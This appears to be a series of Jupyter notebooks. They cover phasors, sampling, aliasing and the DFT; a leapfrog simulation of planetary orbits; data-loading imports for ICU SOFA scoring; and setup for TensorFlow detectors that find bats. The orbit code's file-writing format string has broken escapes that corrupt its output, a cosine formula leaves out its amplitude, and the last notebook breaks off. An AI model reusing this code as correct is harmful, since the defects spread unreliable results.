<div class="alert alert-success">
It's often easier to deal with angles measured in <strong>radians</strong> rather than <strong>degrees</strong>. The main thing to note is that:
$$2\pi \text{ radians} = 360 \text{ degrees, i.e. 1 full circle }$$
Again, it may not seem obvious why we should want to use radians instead of the more familiar degrees. The reason is that it makes dividing up a circle really nice and neat and so ends up making calculations much easier in the long run!
</div>
So that describes a generic sinusoid, e.g. $\sin(\theta)$, but now you might ask yourself how do we generate a generate a sine wave with a specific frequency $f$ Herzt (Hz=cycles/second)?
Let's take a concrete example, if we want a sinusoid with a frequency of $f=10$ Hz, that means:
* **Frequency:** we need to complete 10 full circles of the phasor in 1 second.
* **Period:** So, we have to complete 1 full cycle every 1/10 seconds (i.e. the period of this sinusoid $T=0.1$ seconds).
* **Angular velocity:** So, the phasor has to rotate at a speed of $2\pi/0.1 = 20\pi$ radians per second
So if we take $t$ to represent time, a sine wave with frequency 10 Hz has the form $\sin(20\pi t)$
* Check: at $t=0.1$ seconds we have $\sin(20 \times \pi \times 0.1) = \sin(2\pi)$, one full cycle.
* This corresponds to the phasor $e^{20\pi t j}$, where $t$ represents some point in time.
In general:
* A sine wave with peak amplitude R and frequency $f$ Hz is expressed as $R\sin(2 \pi f t)$
* The amplitude of this sine wave at time $t$ corresponds to the imaginary part of the phasor $Re^{2\pi ftj}$.
* A cosine wave with peak amplitude R and frequency $f$ Hz is expressed as $\cos (2 \pi f t$)
* The amplitude of this cosine wave at time $t$ corresponds to the real part of the phasor $Re^{2\pi ftj}$.
The term $2\pi f$ corresponds to the angular velocity, often written as $\omega$ which is measured in radians per second.
### Exercise
Q: What's the frequency of $\sin(2\pi t)$?
## Frequency and Sampling Rate
The representation above assumes we're dealing with a continuous sinusoid, but since we're dealing with computers we need to think about digital (i.e. discrete) representations of waveforms.
So if we want to analyze a wave, we also need to sample it at a specific **sampling rate**, $f_s$.
For a given sampling rate $f_s$ (samples/second) we can work out the time between each sample, the **sampling period** as:
$$ t_s = \frac{1}{f_s}$$
The units of $t_s$ is seconds/sample. That means that if we want a phasor to complete $f$ cycles/second, the angle between each sampled $\theta_s$ step will need to be a certain size in order to complete a full cycle every $t_s$ seconds.
The units here help us figure this out: the desired frequency $f$ has units cycles/second. So, we can calculate what fraction of a complete cycle we need to take with each sample by multiplying $f$ with the sampling time $t_s$.
* $c_s = ft_s$.
* cycles/sample = cycles/second x seconds/sample
We know each cycle is $2\pi$ radians (360 degrees), so we can then convert $c_s$ to an angle as follows:
* $ \theta_s = 2 \pi c_s $
### Exercise
Q: Calculate the period $t_s$ and angle $\theta_s$ between samples for a sine wave with frequency $f=8$ Hz and sampling rate of $f_s=64$
### Notes
### Setting the Phasor Frequency
I've written a function `gen_phasors_vals_freq` that calculates the complex phasor values (`zs`), angles (`thetas`) and time steps (`tsteps`) for a phasor with a given frequency `freq` over a given time period (`Tmin` to `Tmax`). In the following we'll use this to plot how changes in the phasor relate to changes in the corresponding sinusoid given a specific sampling rate (`sampling_rate`).
#### Example:
Let's look at a phasor and corresponding sine wave with frequency $f=2$ Hz (`freq`), given a sampling rate of $f_s=16$ (`sampling_rate`) over 4 seconds.
```
## Our parameters:
Tmin = 0
Tmax = 4
freq = 2 # cycles/second
sampling_rate = 16 # i.e, f_s above
t_step=1/sampling_rate # i.e., t_s above
## Get our complex values corresponding to the phasor with frequency freq
zs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)
## Project to real and imaginary parts for plotting
Xs = np.real(zs)
Ys = np.imag(zs)
## generate the background for the plot: a phasor diagram on the left, a time v amplitude graph on the right
fig, phasor, sinusoid = create_anim_bkg(tsteps, thetas, freq)
## the phasor is plotted on the left on the left with a circle with radius 1 for reference
phasor.set_xlabel("Real values")
phasor.set_ylabel("Imaginary values")
# plot the points the phasor will "step on"
phasor.scatter(Xs, Ys)
## Plot our actual sampled sine wave in magenta on the right
sinusoid.plot(tsteps, Ys, 'o', color='magenta')
sinusoid.set_xlabel("Time (s)")
sinusoid.set_ylabel("Amplitude")
```
You should see two graphs above:
* On the left is the phasor diagram: the grey circle represents a phasor with magnitude 1, the red dots represents the points on the circle that the phasor samples between `tmin` and `tmax` given the `sampling_rate`.
* On the right is the time versus amplitude graph: The grey line shows a continuous sine wave with with frequency `freq`, the magenta dots show the points we actually sample between times `tmin` and `tmax` given the `sampling_rate`.
You can see that although we sample 64 points for the sine wave, we actually just hit the same 8 values per cycle on the phasor.
It's clearer when we animate it the phasor in time:
```
## Now let's animate it!
## a helper to draw the 'clockhand' line
X, Y, n_samples = get_line_coords(Xs, Ys)
## initialize the animation
line = phasor.plot([], [], color='b', lw=3)[0]
sin_t = sinusoid.plot([], [], 'o', color='b')[0]
figs = (line, sin_t)
anim = FuncAnimation(
fig, lambda x: anim_sinusoid(x, X=X, Y=Y, tsteps=tsteps, figs=figs), interval=600, frames=n_samples)
HTML(anim.to_html5_video())
```
### Exercise
Change the `freq` variable in the code below to investigate:
* What happens when the sine wave frequency (cycles/second) `freq` is set to `sampling_rate/2`?
* What happens when the frequency `freq` approaches the half the `sampling_rate`?
* What happens when the frequency `freq` equals the half the `sampling_rate`?
* What happens when the frequency `freq` is greater than `sampling_rate/2`
```
## Example: Play around with these values
Tmax = 1
Tmin = 0
freq = 15 # cycles/second
sampling_rate = 16 # f_s above
t_step=1/sampling_rate
print("freq=%.2f cycles/sec, sampling rate=%.2f samples/sec, sampling period=%.2f sec" % (freq, sampling_rate, t_step) )
## Get our complex values corresponding to the sine wave
zs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)
## Project to real and imaginary parts for plotting
Xs = np.real(zs)
Ys = np.imag(zs)
## generate the background
fig, phasor, sinusoid = create_anim_bkg(tsteps, thetas, freq)
## Plot the phasor samples
phasor.scatter(Xs, Ys)
phasor.set_xlabel("Real values")
phasor.set_ylabel("Imaginary values")
## Plot our actual sampled sine wave in magenta
sinusoid.plot(tsteps, Ys, 'o-', color='magenta')
sinusoid.set_xlabel("Time (s)")
sinusoid.set_ylabel("Amplitude")
## Animate the phasor and sinusoid
X, Y, n_samples = get_line_coords(Xs, Ys)
line = phasor.plot([], [], color='b', lw=3)[0]
sin_t = sinusoid.plot([], [], 'o', color='b')[0]
figs = (line, sin_t)
anim = FuncAnimation(
fig, lambda x: anim_sinusoid(x, X=X, Y=Y, tsteps=tsteps, figs=figs), interval=600, frames=n_samples)
HTML(anim.to_html5_video())
```
### Notes
## Aliasing
If you change the frequency (`freq`) for the phasor to be higher than half the sampling rate , you'll see that the actual frequency of the sinusoid doesn't actually keep getting higher. In fact, with `freq=8` the sine wave (i.e. projection of the vertical (imaginary) component) doesn't appear to have any amplitude modulation at all. However, keen readers will note that for `sampling_rate=16` and `freq=8` in the example above, the real projection (i.e. cosine) would show amplitude modulations since $\cos(t)$ is 90 degree phase shifted relative to $\sin(t)$. The phasor `freq=15` appears to complete only one cycle per second, just like for `freq=1`, but appears to rotating the opposite way.
These are examples of **aliasing**: given a specific sampling rate there is a limit to which we can distinguish different frequencies because we simply can't take enough samples to show the difference!
In the example above, even though we are sampling from a 15 Hz wave for `freq=15`, we only get one sample per cycle and the overall sampled sequence looks like a 1 Hz wave. So, the fact that the phasor appears to rotate the opposite way to `freq=1` is because it's actually just the 15th step of the `freq=1` phasor.
<div class="alert alert-success">
In general, with a sampling rate of $f_s$ we can't distinguish between a sine wave of frequency $f_0$ and a sine wave of $f_0 + kf_s$ for any integer $k$.
</div>
This means that we can't actually tell the frequency of the underlying waveform based on the sample amplitudes alone.
The practical upshot of this is that for sampling rate $f_s$, the highest frequency we can actually sample is $f_s/2$, the **Nyquist Frequency**. This is one of the most important concepts in digital signal processing and will effect pretty much all the methods we use. It's why we see the mirroring effect in [the DFT output spectrum](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb). So, if you remember just one thing, remember this!
## Superposition
This use of phasors to represent sinusoids may seem excessively complex at the moment, but it actually gives us a nice way of visualizing what happens when we add two sine waves together, i.e. linear superposition.
We've seen how the Fourier Transform gives us a way of breaking down periodic waveforms (no matter how complicated) into a linear combination of sinusoids (cosine waves, specifically). But if you've seen the actual DFT equations, you'll have noticed that each DFT output is actually is described in terms of phasors of specific frequencies (e.g. sums over $e^{-j \theta}$ values). We can now get at least a visual idea of what this means.
Let's look at how can combining phasors can let us define complicated waveforms in a simple manner.
### Magnitude and Phase Modifications
First, let's note that we can easily change the magnitude and phase of a sine wave before adding it to others to make a complex waveform.
* We can change the magnitude of a sinusoidal component by multiplying all the values of that sinusoid by a scalar $r$.
* We can apply a phase shift of $\phi$ radians to $\sin(\theta)$ to gives us a sine wave of the form: $\sin(\theta + \phi)$. It basically means we start our cycles around the unit circle at $e^{i\phi}$ instead of at $e^{i0} = 1 + i0 \mapsto (1,0)$
### Generating linear combinations of sinusoids
Let's plot some combinations of sinusoids.
First let's set the sampling rate and the start and end times of the sequence we're going to generate:
```
## Some parameters to play with
Tmax = 2
Tmin = 0
sampling_rate = 16
t_step=1/sampling_rate
```
Now, let's create some phasors with different magnitudes, frequencies and phases. Here we create 2 phasors with magnitude 1 and no phase shift, one with `freq=2` Hz and another phasor with frequency `2*freq`.
We then add the two phasors values together at each timestep (`zs_sum` in the code below):
```
## Define a bunch of sinusoids. We can do this in terms of 3 parameters:
## (magnitude, frequency, phase)
## The following defines two sinusoids, both with magnitude (peak amplitude) 1 and the same phase (no phase shift)
## The second has double the frequency of the first:
freq=2
params = [(1, freq, 0), (1, 2*freq, 0)]
## Later: change these values and see what happens, e.g.
#params = [(1, freq, 0), (0.4, 5*freq, 0), (0.4, 5*freq, np.pi)]
phasor_list = []
theta_list = []
tsteps_list = []
## Generate a list of phasors for each set of (mag, freq, phase) parameters
for mag, freq, phase in params:
## Generate a phasor with frequency freq
## zs are the phasor values
## thetas are the corresponding angles for each value in zs
## tsteps are the corresponding time steps for each value in zs
zs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)
## Apply the phase_shift
phase_shift = np.exp(1j*phase)
## scale by the magnitude mag - changes the peak amplitude
zs = mag*zs*phase_shift
## Append the phasor to a list
phasor_list.append(zs)
## The angle sequence and time sequence in case you want to inspect them
## We don't actually use them below
theta_list.append(thetas)
tsteps_list.append(tsteps)
## Superposition: add the individual phasors in the list together (all with the same weights right now)
zs_sum = np.zeros(len(tsteps_list[0]))
for z in phasor_list:
zs_sum = zs_sum + z
```
Now, we can plot the sine (vertical) component of the individual phasors (on the right), ignoring the cosine (horizontal) component for the moment.
```
## Plot the phasor (left) and the projection of the imaginary (vertical) component (right)
## cosproj would be the projection to the real axis, but let's just ignore that for now
fig, phasor, sinproj, cosproj = create_phasor_sinusoid_bkg(Tmin, Tmax, ymax=3, plot_phasor=True, plot_real=False, plot_imag=True,)
dense_tstep=0.001
for mag, freq, phase in params:
## We just want to plot the individual sinusoids (time v amplitude), so we ignore
## the complex numbers we've been using to plot the phasors
_, dense_thetas, dense_tsteps = gen_phasor_vals_freq(Tmin, Tmax, dense_tstep, freq)
sinproj.plot(dense_tsteps, mag*np.sin(dense_thetas+phase), color='grey')
```
Now plot the sum of the phasors (left) and the projected imaginary component in magenta (right) - that is, the sum of the sine components (in grey)
```
## Plot sinusoids as sampled
Xlist = []
Ylist = []
## some hacks to get to represent the individual phasors as lines from the centre of a circle as well as points
for i, zs in enumerate(phasor_list):
Xs_ = np.real(zs)
Ys_ = np.imag(zs)
X_, Y_, _ = get_line_coords(Xs_, Ys_)
Xlist.append(X_)
Ylist.append(Y_)
## Project the real and imaginary parts of the timewise summed phasor values
Xs = np.real(zs_sum)
Ys = np.imag(zs_sum)
Xline, Yline, _ = get_line_coords(Xs, Ys)
## plot the summed phasor values as 2-d coordinates (left)
## plot the sine projection of the phasor values in time (right)
sinproj.plot(tsteps_list[0], Ys, color='magenta')
fig
```
Now let's see an animation of how we're adding these phasors together!
```
anim = get_phasor_animation(Xline, Yline, tsteps, phasor, sinproj, cosproj, fig, Xlist=Xlist, Ylist=Ylist, params=params)
anim
```
In the animation above you should see:
* the red circle represents the first phasor (`freq=2`)
* the blue circle represents the 2nd phasor (`freq=4`)
* In adding the the two phasors together, we add the corresponding vectors for each phasor at each point in time.
### Exercise:
* What happens when you add up two sinusoids with the same frequency but different magnitudes
* e.g. `params = [(1, freq, 0), (2, freq, 0)]`
* What happens when you change the phase?
* Can you find $\phi$ such that $\sin(\theta+\phi) = \cos(\theta)$ ?
* When do the individual sinusoids cancel each other out?
* Assume you have a compound sinusoid defined by the following params:
* `params = [(1, freq, 0), (0.4, 5*freq, 0)]`
* What sinusoid could you add to cancel the higher frequency component out while keeping the lower frequency one?
### Notes
## Maths Perspective: The DFT equation as a sum of phasors
Now if you look at the mathematical form of the DFT, you can start to recognize this as representing a sequence of phasors of different frequencies, which have a real (cosine) and imaginary (sine) component.
The DFT is defined as follows:
* For input: $x[n]$, for $n=0..N-1$ (i.e. a time series of $N$ samples)
* We calculate an output of N complex numbers $\mapsto$ magnitude and phases of specific phasors:
Where the $k$th output, DFT[k], is calculated using the following equation:
$$
\begin{align}
DFT[k] &= \sum_{n=0}^{N-1} x[n] e^{-j \frac{2\pi n}{N} k} \\
\end{align}
$$
Which is equivalent to the following (using Euler's rule):
$$
\begin{align}
DFT[k] &= \sum_{n=0}^{N-1} x[n]\big[\cos(\frac{2\pi n}{N} k) - j \sin(\frac{2\pi n}{N} k) \big]
\end{align}
$$
This basically says that each DFT output is the result of multiplying the $n$th input value $x[n]$ with the $n$th sample of a phasor (hence sine and cosine waves) of a specific frequency, and summing the result (hence the complex number output). The frequency of DFT[k] is $k$ times the frequency of DFT[1], where the frequency of DFT[1] depends on the input size $N$ and the sampling rate (as discussed the [this notebook](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)). The sampling rate determines the time each phasor step takes, hence how much time it takes to make a full phasor cycle, hence what frequencies we can actually compare the input against.
The pointwise multiplication and summation is also known as a dot product (aka inner product). The dot product between two vectors tells us how similar those two vectors are. So in a very rough sense, the DFT 'figures out' which frequency components are present in the input, by looking at how similar the input is to each of the N phasors represented in the DFT output.
There are two more notebooks on the DFT for this module, but both are extension material (not essential).
* [This notebook](./signals-1-3-discrete-fourier-transform-in-detail.ipynb) goes into more maths details but is purely extension (you can skip)
* [This notebook](./signals-1-4-more-interpreting-the-dft.ipynb) looks at a few more issues in interpreting the DFT
So, you can look at those if you want more details. Otherwise, we'll move onto the source-filter model in the second signals lab!
|
github_jupyter
|
```
%matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
from collections import namedtuple
class planet():
"A planet in our solar system"
def __init__(self,semimajor,eccentricity):
self.x = np.zeros(2) #x and y position
self.v = np.zeros(2) #x and y velocity
self.a_g = np.zeros(2) #x and y acceleration
self.t = 0.0 #current time
self.dt = 0.0 #current timestep
self.a = semimajor #semimajor axis of the orbit
self.e = eccentricity #eccentricity of the orbit
self.istep = 0 #current integer timestep1
self.name = "" #name for the planet
solar_system = { "M_sun":1.0, "G":39.4784176043574320}
def SolarCircularVelocity(p):
G = solar_system["G"]
M = solar_system["M_sun"]
r = (p.x[0]**2 + p.x[1]**2)**0.5
#return the circular velocity
return (G*M/r)**0.5
def SolarGravitationalAcceleration(p):
G = solar_system["G"]
M = solar_system["M_sun"]
r = (p.x[0]**2 + p.x[1]**2)**0.5
#acceleration in AU/yr/yr
a_grav = -1.0*G*M/r**2
#find the angle at this position
if(p.x[0]==0.0):
if(p.x[1]>0.0):
theta = 0.5*np.pi
else:
theta = 1.5*np.pi
else:
theta = np.arctan2(p.x[1],p.x[0])
#set the x and y components of the velocity
#p.a_g[0] = a_grav * np.cos(theta)
#p.a_g[1] =a_grav * np.sin(theta)
return a_grav*np.cos(theta), a_grav*np.sin(theta)
def calc_dt(p):
#integration tolerance
ETA_TIME_STEP = 0.0004
#compute timestep
eta = ETA_TIME_STEP
v = (p.v[0]**2 + p.v[1]**2)**0.5
a = (p.a_g[0]**2 + p.a_g[1]**2)**0.5
dt = eta * np.fmin(1./np.fabs(v),1./np.fabs(a)**0.5)
return dt
def SetPlanet(p, i):
AU_in_km = 1.495979e+8 #an AU in km
#circular velocity
v_c = 0.0 #circular velocity in AU/yr
v_e = 0.0 #velocity at perihelion in AU/yr
#planet-by planet initial conditions
#Mercury
if(i==0):
#semi-major axis in AU
p.a = 57909227.0/AU_in_km
#eccentricity
p.e = 0.20563593
#name
p.name = "Mercury"
#Venus
elif(i==1):
#semi-major axis in AU
p.a = 108209475.0/AU_in_km
#eccentricity
p.e = 0.00677672
#name
p.name = "Venus"
#Earth
elif(i==2):
#semi-major axis in AU
p.a = 1.0
#eccentricity
p.e = 0.01671123
#name
p.name = "Earth"
#set remaining properties
p.t = 0.0
p.x[0] = p.a*(1.0-p.e)
p.x[1] = 0.0
#get equiv circular velocity
v_c = SolarCircularVelocity(p)
#velocity at perihelion
v_e = v_c*(1 + p.e)**0.5
#set velocity
p.v[0] = 0.0 #no x velocity at perihelion
p.v[1] = v_e #y velocity at perihelion (counter clockwise)
#calculate gravitational acceleration from Sun
p.a_g = SolarGravitationalAcceleration(p)
#set timestep
p.dt = calc_dt(p)
def x_first_step(x_i, v_i, a_i, dt):
#x_1/2 = x_0+ 1/2 v_0 Delta_t + 1/4 a_0 Delta t^2
return x_i + 0.5*v_i*dt + 0.25*a_i*dt**2
def v_full_step(v_i,a_ipoh,dt):
#v_i+1 = v_i + a_i+1/2 Delta t
return v_i + a_ipoh*dt;
def x_full_step(x_ipoh, v_ipl, a_ipoh, dt):
#x_3/2 = x_1/2 + v_i+1 Delta t
return x_ipoh + v_ipl*dt;
def SaveSolarSystem(p, n_planets, t, dt , istep, ndim):
#loop over the number of planets
for i in range(n_planets):
#define a filename
fname = "planet.%s.txt" % p[i].name
if(istep==0):
#create the file on the first timestep
fp = open(fname,"w")
else:
#append the file on subsequent timesteps
fp = open(fname,"a")
#compute the drifted properties of the planet
v_drift = np.zeros(ndim)
for k in range(ndim):
v_drift[k] = p[i].v[k] + 0.5*p[i].a_g[k]*p[i].dt
#write the data to file
s = "%6d\t%6.5f\t%6.5f\t%6d\t%6.5f\t%6.5f\t%6.5f\t%6.5ft\%6.5f\t%6.5f\t%6.5f\t%6.5fn" % \
(istep,t,dt,p[i].istep,p[i].t,p[i].dt,p[i].x[0],p[i].x[1],v_drift[0],v_drift[1],p[i].a_g[0],p[i].a_g[1])
fp.write(s)
#close the file
fp.close()
def EvolveSolarSystem(p,n_planets,t_max):
#number of spatial dimensions
ndim = 2
#define the first timestep
dt = 0.5/265.25
#define the starting time
t = 0.0
#define the starting timestep
istep = 0
#save the initial conditions
SaveSolarSystem(p,n_planets,t,dt,istep,ndim)
#begin a loop over the global timescale
while(t<t_max):
#check to see if the next step exceeds the
#maximum time. If so, take a smaller step
if(t+dt>t_max):
dt = t_max - t #limit the step to align with t_max
#evolve each planet
for i in range(n_planets):
while(p[i].t<t+dt):
#special case for istep==0
if(p[i].istep==0):
#take the first step according to a verlet scheme
for k in range(ndim):
p[i].x[k] = x_first_step(p[i].x[k],p[i].v[k],p[i].a_g[k],p[i].dt)
#update the acceleration
p[i].a_g = SolarGravitationalAcceleration(p[i])
#update the time by 1/2dt
p[i].t += 0.5*p[i].dt
#update the timestep
p[i].dt = calc_dt(p[i])
#continue with a normal step
#limit to align with the global timestep
if(p[i].t + p[i].dt > t+dt):
p[i].dt = t+dt-p[i].t
#evolve the velocity
for k in range(ndim):
p[i].v[k] = v_full_step(p[i].v[k],p[i].a_g[k],p[i].dt)
#evolve the position
for k in range(ndim):
p[i].x[k] = x_full_step(p[i].x[k],p[i].v[k],p[i].a_g[k],p[i].dt)
#update the acceleration
p[i].a_g = SolarGravitationalAcceleration(p[i])
#update by dt
p[i].t += p[i].dt
#compute the new timestep
p[i].dt = calc_dt(p[i])
#update the planet's timestep
p[i].istep+=1
#now update the global system time
t+=dt
#update the global step number
istep += 1
#output the current state
SaveSolarSystem(p,n_planets,t,dt,istep,ndim)
#print the final steps and time
print("Time t = ",t)
print("Maximum t = ", t_max)
print("Maximum number of steps = ", istep)
#end of evolution
def read_twelve_arrays(fname):
fp = open(fname,"r")
fl = fp.readlines()
n = len(fl)
a = np.zeros(n)
b = np.zeros(n)
c = np.zeros(n)
d = np.zeros(n)
f = np.zeros(n)
g = np.zeros(n)
h = np.zeros(n)
j = np.zeros(n)
k = np.zeros(n)
l = np.zeros(n)
m = np.zeros(n)
p = np.zeros(n)
for i in range(n):
a[i] = float(fl[i].split()[0])
b[i] = float(fl[i].split()[1])
c[i] = float(fl[i].split()[2])
d[i] = float(fl[i].split()[3])
f[i] = float(fl[i].split()[4])
g[i] = float(fl[i].split()[5])
h[i] = float(fl[i].split()[6])
j[i] = float(fl[i].split()[7])
k[i] = float(fl[i].split()[8])
l[i] = float(fl[i].split()[9])
m[i] = float(fl[i].split()[10])
p[i] = float(fl[i].split()[11])
return a,b,c,d,f,g,h,j,k,l,m,p
#set the number of planets
n_planets = 3
#set the maxmimum time of the simulation
t_max = 2.0
#create empty list of planets
p = []
#set the planets
for i in range(n_planets):
#create an empty planet
ptmp = planet(0.0,0.0)
#set the planet properties
SetPlanet(ptmp,i)
#remember the planet
p.append(ptmp)
#evolve the solar system
EvolveSolarSystem(p,n_planets,t_max)
fname = "planet.Mercury.txt"
istepMg,tMg,dtMg,istepM,tM,dtM,xM,yM,vxM,vyM,axM,ayM = read_twelve_arrays(fname)
fname = "planet.Earth.txt"
istepEg,tEg,dtEg,istepE,tE,dtE,xE,yE,vxE,vyE,axE,ayE = read_twelve_arrays(fname)
fname = "planet.Venus.txt"
istepVg,tVg,dtVg,istepV,tV,dtV,xV,yV,vx,vyV,axV,ayV = read_twelve_arrays(fname)
```
|
github_jupyter
|
<img src="../../img/logo_amds.png" alt="Logo" style="width: 128px;"/>
# AmsterdamUMCdb - Freely Accessible ICU Database
version 1.0.2 March 2020
Copyright © 2003-2020 Amsterdam UMC - Amsterdam Medical Data Science
## Sequential Organ Failure Assessment (SOFA)
The sequential organ failure assessment score (SOFA score), originally published as as the Sepsis-related Organ Failure Assessment score ([Vincent et al., 1996](http://link.springer.com/10.1007/BF01709751)), is a disease severity score designed to track the severity of critical ilness throughout the ICU stay. In contrast to APACHE (II/IV), which only calculates a score for the first 24 hours, it can be used sequentially for every following day. The code performs some data cleanup and calculates the SOFA score for the first 24 hours of ICU admission for all patients in the database.
**Note**: Requires creating the [dictionaries](../../dictionaries/create_dictionaries.ipynb) before running this notebook.
## Imports
```
%matplotlib inline
import amsterdamumcdb
import psycopg2
import pandas as pd
import numpy as np
import re
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib as mpl
import io
from IPython.display import display, HTML, Markdown
sofa = pd.read_csv('sofa/sofa.csv')
oxy_flow = pd.read_csv("sofa/oxy_flow.csv" )
sofa_respiration = pd.read_csv("sofa/sofa_respiration.csv" )
sofa_platelets = pd.read_csv("sofa/sofa_platelets.csv" )
sofa_bilirubin = pd.read_csv("sofa/sofa_bilirubin.csv" )
sofa_cardiovascular = pd.read_csv("sofa/sofa_cardiovascular.csv" )
mean_abp = pd.read_csv("sofa/mean_abp.csv" )
sofa_cardiovascular_map = pd.read_csv("sofa/sofa_cardiovascular_map.csv" )
gcs = pd.read_csv("sofa/gcs.csv" )
sofa_cns = pd.read_csv("sofa/sofa_cns.csv" )
sofa_renal_urine_output = pd.read_csv("sofa/sofa_renal_urine_output.csv" )
sofa_renal_daily_urine_output = pd.read_csv("sofa/sofa_renal_daily_urine_output.csv" )
creatinine = pd.read_csv("sofa/creatinine.csv" )
sofa_renal_creatinine = pd.read_csv("sofa/sofa_renal_creatinine.csv" )
sofa_renal = pd.read_csv("sofa/sofa_renal.csv" )
'''
bloc,icustayid,charttime,gender,age,elixhauser,re_admission,died_in_hosp,died_within_48h_of_out_time,
mortality_90d,delay_end_of_record_and_discharge_or_death,
Weight_kg,GCS,HR,SysBP,MeanBP,DiaBP,RR,SpO2,Temp_C,FiO2_1,Potassium,Sodium,Chloride,Glucose,
BUN,Creatinine,Magnesium,Calcium,Ionised_Ca,CO2_mEqL,SGOT,SGPT,Total_bili,Albumin,Hb,WBC_count,
Platelets_count,PTT,PT,INR,Arterial_pH,paO2,paCO2,Arterial_BE,Arterial_lactate,HCO3,mechvent,
Shock_Index,PaO2_FiO2,median_dose_vaso,max_dose_vaso,input_total,
input_4hourly,output_total,output_4hourly,cumulated_balance,SOFA,SIRS
'''
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/aubricot/computer_vision_with_eol_images/blob/master/object_detection_for_image_cropping/chiroptera/chiroptera_train_tf2_ssd_rcnn.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Train Tensorflow Faster-RCNN and SSD models to detect bats (Chiroptera) from EOL images
---
*Last Updated 19 Oct 2021*
-Now runs in Python 3 with Tensorflow 2.0-
Use EOL user generated cropping coordinates to train Faster-RCNN and SSD Object Detection Models implemented in Tensorflow to detect bats from EOL images. Training data consists of the user-determined best square thumbnail crop of an image, so model outputs will also be a square around objects of interest.
Datasets were downloaded to Google Drive in [chiroptera_preprocessing.ipynb](https://github.com/aubricot/computer_vision_with_eol_images/blob/master/object_detection_for_image_cropping/chiroptera/chiroptera_preprocessing.ipynb).
***Models were trained in Python 2 and TF 1 in Jan 2020: RCNN trained for 2 days to 200,000 steps and SSD for 4 days to 450,000 steps.***
Notes:
* Before you you start: change the runtime to "GPU" with "High RAM"
* Change parameters using form fields on right (/where you see 'TO DO' in code)
* For each 24 hour period on Google Colab, you have up to 12 hours of free GPU access.
References:
* [Official Tensorflow Object Detection API Instructions](https://tensorflow-object-detection-api-tutorial.readthedocs.io/en/latest/training.html)
* [Medium Blog on training using Tensorflow Object Detection API in Colab](https://medium.com/analytics-vidhya/training-an-object-detection-model-with-tensorflow-api-using-google-colab-4f9a688d5e8b)
## Installs & Imports
---
```
# Mount google drive to import/export files
from google.colab import drive
drive.mount('/content/drive', force_remount=True)
# For running inference on the TF-Hub module
import tensorflow as tf
import tensorflow_hub as hub
# For downloading and displaying images
import matplotlib
import matplotlib.pyplot as plt
import tempfile
import urllib
from urllib.request import urlretrieve
from six.moves.urllib.request import urlopen
from six import BytesIO
# For drawing onto images
from PIL import Image
from PIL import ImageColor
from PIL import ImageDraw
from PIL import ImageFont
from PIL import ImageOps
# For measuring the inference time
import time
# For working with data
import numpy as np
import pandas as pd
import os
import csv
# Print Tensorflow version
print('Tensorflow Version: %s' % tf.__version__)
# Check available GPU devices
print('The following GPU devices are available: %s' % tf.test.gpu_device_name())
# Define functions
# Read in data file exported from "Combine output files A-D" block above
def read_datafile(fpath, sep="\t", header=0, disp_head=True):
"""
Defaults to tab-separated data files with header in row 0
"""
try:
df = pd.read_csv(fpath, sep=sep, header=header)
if disp_head:
print("Data header: \n", df.head())
except FileNotFoundError as e:
raise Exception("File not found: Enter the path to your file in form field and re-run").with_traceback(e.__traceback__)
return df
# To load image in and do something with it
def load_img(path):
img = tf.io.read_file(path)
img = tf.image.decode_jpeg(img, channels=3)
return img
# To display loaded image
def display_image(image):
fig = plt.figure(figsize=(20, 15))
plt.grid(False)
plt.imshow(image)
# For reading in images from URL and passing through TF models for inference
def download_and_resize_image(url, new_width=256, new_height=256, #From URL
display=False):
_, filename = tempfile.mkstemp(suffix=".jpg")
response = urlopen(url)
image_data = response.read()
image_data = BytesIO(image_data)
pil_image = Image.open(image_data)
im_h, im_w = pil_image.size
pil_image = ImageOps.fit(pil_image, (new_width, new_height), Image.ANTIALIAS)
pil_image_rgb = pil_image.convert("RGB")
pil_image_rgb.save(filename, format="JPEG", quality=90)
#print("Image downloaded to %s." % filename)
if display:
display_image(pil_image)
return filename, im_h, im_w
# Download, compile and build the Tensorflow Object Detection API (takes 4-9 minutes)
# TO DO: Type in the path to your working directory in form field to right
basewd = "/content/drive/MyDrive/train" #@param {type:"string"}
%cd $basewd
# Set up directory for TF2 Model Garden
# TO DO: Type in the folder you would like to contain TF2
folder = "tf2" #@param {type:"string"}
if not os.path.exists(folder):
os.makedirs(folder)
%cd $folder
os.makedirs("tf_models")
%cd tf_models
# Clone the Tensorflow Model Garden
!git clone --depth 1 https://github.com/tensorflow/models/
%cd ../..
# Build the Object Detection API
wd = basewd + '/' + folder
%cd $wd
!cd tf_models/models/research/ && protoc object_detection/protos/*.proto --python_out=. && cp object_detection/packages/tf2/setup.py . && python -m pip install .
```
## Model preparation (only run once)
---
These blocks download and set-up files needed for training object detectors. After running once, you can train and re-train as many times as you'd like.
### Download and extract pre-trained models
```
# Download pre-trained models from Tensorflow Object Detection Model Zoo
# https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/tf2_detection_zoo.md
# SSD and Faster-RCNN used as options below
# modified from https://github.com/RomRoc/objdet_train_tensorflow_colab/blob/master/objdet_custom_tf_colab.ipynb
import shutil
import glob
import tarfile
# CD to folder where TF models are installed (tf2)
%cd $wd
# Make folders for your training files for each model
# Faster RCNN Model
if not (os.path.exists('tf_models/train_demo')):
!mkdir tf_models/train_demo
if not (os.path.exists('tf_models/train_demo/rcnn')):
!mkdir tf_models/train_demo/rcnn
if not (os.path.exists('tf_models/train_demo/rcnn/pretrained_model')):
!mkdir tf_models/train_demo/rcnn/pretrained_model
if not (os.path.exists('tf_models/train_demo/rcnn/finetuned_model')):
!mkdir tf_models/train_demo/rcnn/finetuned_model
if not (os.path.exists('tf_models/train_demo/rcnn/trained')):
!mkdir tf_models/train_demo/rcnn/trained
# Download the model
MODEL = 'faster_rcnn_resnet50_v1_640x640_coco17_tpu-8'
MODEL_FILE = MODEL + '.tar.gz'
